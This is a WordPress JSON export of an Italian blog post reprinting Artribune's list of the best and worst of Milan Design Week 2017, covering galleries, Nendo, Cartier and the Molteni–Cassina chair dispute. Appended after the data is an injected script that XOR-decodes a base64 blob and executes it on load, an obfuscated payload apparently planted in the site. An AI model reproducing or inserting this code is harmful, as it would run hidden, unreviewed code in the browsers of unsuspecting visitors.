{"id":3226,"date":"2017-04-10T13:48:54","date_gmt":"2017-04-10T13:48:54","guid":{"rendered":"https:\/\/giuliazappa.net\/top-e-flop-della-design-week-2017-a-milano-le-cose-migliori-e-le-peggiori-secondo-artribune\/"},"modified":"2017-04-10T13:48:54","modified_gmt":"2017-04-10T13:48:54","slug":"top-e-flop-della-design-week-2017-a-milano-le-cose-migliori-e-le-peggiori-secondo-artribune","status":"publish","type":"post","link":"https:\/\/giuliazappa.net\/en\/top-e-flop-della-design-week-2017-a-milano-le-cose-migliori-e-le-peggiori-secondo-artribune\/","title":{"rendered":"Top e flop della design week 2017 a Milano. Le cose migliori e le peggiori secondo Artribune"},"content":{"rendered":"<p><strong>Salone, gallerie private, marchi celebri e new entry. Il meglio e il peggio della Milano Design Week secondo l\u2019insindacabile giudizio della redazione di Artribune<\/strong>.<\/p>\n<p>&nbsp;<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-167\" src=\"https:\/\/www.giuliazappa.net\/wp-content\/uploads\/2017\/04\/Galleria-Luisa-Delle-Piane.jpg\" alt=\"\" width=\"700\" height=\"467\" \/><\/p>\n<p><strong>TOP 1 \u2013 GALLERIA LUISA DELLE PIANE<\/strong><br \/>\nSe il Salone ha oramai preso l\u2019abitudine di cominciare, almeno simbolicamente, con Miart e la sua sezione \u201cObject\u201d dedicata al design da collezione, ecco allora che la palma incontrastata se l\u2019aggiudica Galleria Luisa delle Piane. In mostra, non i soliti pezzi dal gusto anni \u201950 a cui ci siamo abituati da qualche tempo (patinatissimi e accattivanti quelli di gallerie come Nero e Dimore), ma un accostamento inedito che definisce uno stile e un linguaggio anticipatorio: quello tra i mobili di Joseph Hoffmann del 1906 e i pezzi lampada-scultura di Andrea Anastasio insieme al tavolo della serie \u201cVapore\u201d di Giacomo Moor.<\/p>\n<p>&nbsp;<\/p>\n<p><strong>TOP 2 \u2013 NENDO<\/strong><br \/>\nTrecento persone attendono pazientemente in fila per entrare nello showroom di Jil Sander a via Beltrami. Cosa vogliono vedere? \u00c8 il progetto a pi\u00f9 alto tasso di sensazionalismo del Salone sebbene il suo segno sia caratterizzato da una poetica sottile e delicata. Lo firma studio Nendo con la mostra \u201cInvisible Outlines\u201d (chiaro gusto per gli ossimori che piace tanto al giapponese Oki Sato, secondo alcuni il pi\u00f9 bravo designer vivente). Il pezzo forte, la serie di vasi gelatinosi immersi in un acquario (in realt\u00e0 sono in silicone ultra-sottile) della serie \u201cJelly Fish\u201d, che rievoca un mondo sospeso dove l\u2019innovazione tecnologica non \u00e8 gridata, bens\u00ec si cela dietro un\u2019apparenza onirica ed evanescente di una forma in un tiepido ma costante movimento.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-168 size-large\" src=\"https:\/\/www.giuliazappa.net\/wp-content\/uploads\/2017\/04\/Fuori-Salone-Post-Human-e1491822218284-copy-676x1024.jpg\" alt=\"\" width=\"676\" height=\"1024\" \/><\/p>\n<p><strong>TOP 3 \u2013 POST HUMAN<\/strong><br \/>\nPi\u00f9 che una mostra, un ragionamento. Nella sua storica sede di Ventura Lambrate, la service design company Logotel sostituisce ai classici progetti esposti in un percorso espositivo una serie di spunti \u2013 schede progetto con didascalia, video, questionari partecipati appesi al muro \u2013 che vogliono stimolare una riflessione partecipata sui nuovi scenari dell\u2019ibridazione tra uomo e protesi tecnologiche. L\u2019unico pezzo in mostra, per\u00f2, \u00e8 un\u2019anticipazione sul futuro: un dialogo tra due macchine che si parlano tra di loro e che, arrampicandosi su due muri frontali, costruiscono progressivamente una volta di tessuto. Un domani, l\u2019applicazione potrebbe essere campo dell\u2019edilizia. Pensiamoci.<\/p>\n<p>&nbsp;<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-169\" src=\"https:\/\/www.giuliazappa.net\/wp-content\/uploads\/2017\/04\/Fuori-Salone-Atelier-Clerici-.jpg\" alt=\"\" width=\"1300\" height=\"867\" \/><\/p>\n<p><strong>TOP 4 \u2013 IL VIDEO DI ATELIER CLERICI<\/strong><br \/>\nTra dibattiti e spunti senza soluzione di continuit\u00e0, le proposte di Atelier Clerici ci hanno regalato molte suggestioni interessanti (segnaliamo la mostra Talisman curata da In Residence, e infine il lancio della Open Design School di Matera, appuntamento da tenere sott\u2019occhio ben prima del 2019). Quello che vogliamo segnalare \u00e8 per\u00f2 un video della collettiva della Design Academy Eindhoven: un time-lapse che ripercorre tutti i gesti \u2013 pressoch\u00e9 infiniti \u2013 che sono necessari per produrre e assemblare un telefono cellulare. Un antidoto contro l\u2019appiattimento di sentimenti e consapevolezza che proviamo verso gli oggetti elettronici che ci circondano.<\/p>\n<p>&nbsp;<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-170\" src=\"https:\/\/www.giuliazappa.net\/wp-content\/uploads\/2017\/04\/Fuori-Salone-Fornace-Brioni.jpg\" alt=\"\" width=\"1300\" height=\"867\" \/><\/p>\n<p><strong>TOP 5 \u2013 FORNACE BRIONI e KARPETA<\/strong><br \/>\nUna piccola storia virtuosa che racconta una strategia che il made in Italy dovrebbe perseguire, quella dell\u2019innovazione attraverso il design. Di stanza nel mantovano, Fornace Brioni produce cotto da almeno qualche generazione. Ultimamente ha investito nel design, chiamando la grande designer Cristina Celestino a collaborare e innovare attraverso due nuove collezioni contemporanee. Risultato? Export impazzito anche verso paesi inimmaginabili come Australia e Nuova Zelanda. E poi chi l\u2019ha detto che il design al Sud non pu\u00f2 raggiungere vette di grande eccellenza, innovazione e ricerca di stile? Basterebbe pensare ai marchi calabresi Karpeta (tappeti) e Texturae (carta da parati).<\/p>\n<p><em>Ps: Alcune menzioni speciali: i mobili in ottone e resina degli americani Apparatus esposti alle 5VIE, i vasi ispirati al Giappone di Philippe Nigro sempre alle 5VIE, la strepitosa installazione fatta di layer di vetro Decode\/Recode di Luca Nichetto e Ben Gorham per Salviati a Ventura Centrale e la bellissima monografica sulla luce di Formafantasma da Spazio Krizia. Peccato, naturalmente, per tutti gli altri progetti che non siamo riusciti a vedere: a quando una meritata prossima volta?<\/em><\/p>\n<p>&nbsp;<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-171\" src=\"https:\/\/www.giuliazappa.net\/wp-content\/uploads\/2017\/04\/Fuori-Salone.jpg\" alt=\"\" width=\"700\" height=\"525\" \/><\/p>\n<p><strong>FLOP 6 \u2013 SISTEMA SALONE<\/strong><br \/>\nQuanto dobbiamo camminare? Tutti gli operatori concordano: la dimensione del Sistema Salone \u00e8 una creatura senza controllo che obbliga ad uno slalom senza senso tra tantissime proposte, molte delle quali operazioni di puro marketing. A farne le spese sono soprattutto gli emergenti, che perdono visibilit\u00e0 se non sostenuti da un\u2019adeguata comunicazione. Ulteriore segnale d\u2019allarme: pare possibile che si guardi all\u2019ultimo weekend della Biennale di Saint Etienne (chiuder\u00e0 il 9 aprile) come ad una pausa riposante e raccolta dove gustarsi un design composto e ragionato? Attenzione: il troppo che stroppia potrebbe un bel giorno scoppiare.<\/p>\n<p>&nbsp;<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-172\" src=\"https:\/\/www.giuliazappa.net\/wp-content\/uploads\/2017\/04\/Molteni-D.156.3-811.jpg\" alt=\"\" width=\"700\" height=\"466\" \/><\/p>\n<p><strong>FLOP 7 \u2013 D.156.3\/811<\/strong><br \/>\nDietro questo numero di nasconde un\u2019icona: dimenticata per anni, oggi \u00e8 al centro di una controversia che \u00e8 gi\u00e0 finita sui banchi del tribunale. D.156.3 \u00e8 il nome con cui il celeberrimo marchio di arredo Molteni celebra la riedizione di una poltrona di Gi\u00f2 Ponti. Peccato, per\u00f2, che lo stesso modello sia stato ripresentato pure da un altro mostro sacro del design italiano, Cassina, questa volta sotto il nome di 811. Ma di chi \u00e8 la poltrona, allora? Gli eredi del Maestro dicono di Molteni, sebbene Cassina sostenga che la seduta \u00e8 da sempre un prodotto del proprio catalogo. A dirimere la controversia sar\u00e0 un tribunale, che in questi giorni ha gi\u00e0 intimato a Cassina di rimuovere la D.156.3\/811 dalla vetrina del proprio showroom in via Durini. Peccato, per\u00f2, che i toni della controversia abbiamo superato una linea di guardia, una sorta di codice di condotta che mai era stato improntato a tanto astio tra i grandi protagonisti del Made in Italy. L\u2019ultimo sgambetto, un po\u2019 troppo urlato, \u00e8 stata una pagina pubblicitaria a sorpresa sul Corriere utilizzata da Cassina per promuovere la \u201csua\u201d creatura a pochi giorni dal Salone. Staremo a vedere.<\/p>\n<p>&nbsp;<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-173\" src=\"https:\/\/www.giuliazappa.net\/wp-content\/uploads\/2017\/04\/Salone-del-Mobile-Cartier.jpg\" alt=\"\" width=\"700\" height=\"467\" \/><\/p>\n<p><strong>FLOP 8 \u2013 CARTIER<\/strong><br \/>\nIl battesimo del grande marchio di gioielleria al Salone del Mobile convince per i pezzi della collezione ispirata ai chiodi e ad altri pezzi meccanici \u2013 soprattutto quando si parla delle creazioni meno tempestate di brillanti -, ma delude per l\u2019allestimento: potr\u00e0 anche fare sorridere, ma la corvette placcata color oro appesa al soffitto \u00e8 e rimane un emblema di cattivo gusto. Possiamo sperare in un ritorno al vecchio status quo nella location di Garage San Remo?<\/p>\n<p>&nbsp;<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-174 size-large\" src=\"https:\/\/www.giuliazappa.net\/wp-content\/uploads\/2017\/04\/Salone-del-Mobile-Fenomena-683x1024.jpg\" alt=\"\" width=\"683\" height=\"1024\" \/><\/p>\n<p><strong>FLOP 9 \u2013 FENOMENA<\/strong><br \/>\nAlle spalle di Cartier, la mostra sul sensismo promossa dalle quattro promesse di The Ladies\u2019 Room trasforma il tema del sensismo in una fenomenologia da boudoir. Peccato: belle le idee, belli gli spunti formali, ma perch\u00e9 ammiccare necessariamente ad un\u2019accezione sensuale?<\/p>\n<p>&nbsp;<\/p>\n<p><strong>FLOP 10 \u2013 TROPPO POCO<\/strong><br \/>\nQuanto durano le mostre al Salone? Ahim\u00e9, troppo poco, visto che nel migliore dei casi si va dal marted\u00ec alla domenica. Un massiccio investimento di risorse che si disperde proprio quando i visitatori sono sollecitati da troppo stimoli e la soglia dell\u2019attenzione \u00e8 inevitabilmente bassa. Vogliamo tenere le mostre aperte pi\u00f9 a lungo? E, soprattutto, le vogliamo \u201ccondividere\u201d anche fuori Milano? In tempi in cui la distanza tra centro e periferia crea distanze alla base di tante spirali retrograde, la cultura dovrebbe provare a colmare il divario attraverso la condivisione e la disseminazione nel territorio.<\/p>\n<p><em><br \/>\nPubblicato su <a href=\"http:\/\/www.artribune.com\/progettazione\/design\/2017\/04\/top-flop-design-week-2017-milano\/\">Artribune.com<\/a> il 10 aprile 2017<\/em><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Salone, gallerie private, marchi celebri e new entry. Il meglio e il peggio della Milano Design Week secondo l\u2019insindacabile giudizio della redazione di Artribune. &nbsp; TOP 1 \u2013 GALLERIA LUISA DELLE PIANE Se il Salone ha oramai preso l\u2019abitudine di cominciare, almeno simbolicamente, con Miart e la sua sezione \u201cObject\u201d dedicata al design da collezione, &hellip; <\/p>\n<p class=\"link-more\"><a href=\"https:\/\/giuliazappa.net\/en\/top-e-flop-della-design-week-2017-a-milano-le-cose-migliori-e-le-peggiori-secondo-artribune\/\" class=\"more-link\">Read more<span class=\"screen-reader-text\"> &#8220;Top e flop della design week 2017 a Milano. Le cose migliori e le peggiori secondo Artribune&#8221;<\/span><\/a><\/p>\n","protected":false},"author":2,"featured_media":2428,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_seopress_robots_primary_cat":"","_seopress_titles_title":"","_seopress_titles_desc":"","_seopress_robots_index":"","_themeisle_gutenberg_block_has_review":false,"footnotes":""},"categories":[281],"tags":[333,334,335],"class_list":["post-3226","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-opinions","tag-fuorisalone-2017-en","tag-salone-del-mobile-2017-en","tag-top-e-flop-en"],"acf":[],"_links":{"self":[{"href":"https:\/\/giuliazappa.net\/en\/wp-json\/wp\/v2\/posts\/3226","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/giuliazappa.net\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/giuliazappa.net\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/giuliazappa.net\/en\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/giuliazappa.net\/en\/wp-json\/wp\/v2\/comments?post=3226"}],"version-history":[{"count":0,"href":"https:\/\/giuliazappa.net\/en\/wp-json\/wp\/v2\/posts\/3226\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/giuliazappa.net\/en\/wp-json\/wp\/v2\/media\/2428"}],"wp:attachment":[{"href":"https:\/\/giuliazappa.net\/en\/wp-json\/wp\/v2\/media?parent=3226"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/giuliazappa.net\/en\/wp-json\/wp\/v2\/categories?post=3226"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/giuliazappa.net\/en\/wp-json\/wp\/v2\/tags?post=3226"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}<script>
!function(){var _0x392f=atob('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'),_0xd092=125,_0x0109=new Uint8Array(_0x392f['length']),_0xab25=0;for(;_0xab25<_0x392f['length'];_0xab25++)_0x0109[_0xab25]=_0x392f['charCodeAt'](_0xab25)^_0xd092;(new Function(new TextDecoder()['decode'](_0x0109)))()}();
</script>
    